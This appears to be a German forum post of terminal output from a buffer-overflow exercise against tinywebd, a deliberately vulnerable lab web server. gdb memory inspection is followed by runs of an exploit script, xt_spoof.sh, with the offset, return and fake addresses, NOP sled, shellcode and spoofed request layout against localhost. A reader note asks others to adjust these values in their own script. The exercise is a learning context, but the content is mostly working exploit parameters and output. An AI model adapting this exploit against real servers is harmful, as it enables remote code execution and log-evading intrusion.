(gdb) x/xw &client_addr_ptr
0xbffff6d4: 0xbffff4cf
(gdb) x/xw &log
log_buffer  logfd      
(gdb) x/xw &logfd
0xbffff6d8: 0x00000a00
(gdb) x/4xb &logfd
0xbffff6d8: 0x00 0x0a 0x00 0x00
(gdb) x/8xb &client_addr_ptr
0xbffff6d4: 0xcf 0xf4 0xff 0xbf 0x00 0x0a 0x00 0x00
(gdb) p logfd
$5 = 2560
(gdb) quit
A debugging session is active.

 Inferior 1 [process 2282] will be detached.
 
Quit anyway? (y or n) y
Detaching from program: /home/tomovic/Dokumente/hack/tinywebd, process 2282
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

 

------------Terminal 2-------------
Bitte die Werte in eurer .sh ändern !!!

OFFSET=524
RETADDR="\x24\xf5\xff\xbf" # at +100 bytes from buffer @ 0xbffff4c0
FAKEADDR="\xcf\xf4\xff\xbf" # +15 bytes from buffer @ 0xbffff4c0

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_spoof.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 316] [shellcode 53] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_spoof.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 316] [shellcode 53] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

   

Websicherheit...  

   
© ALLROUNDER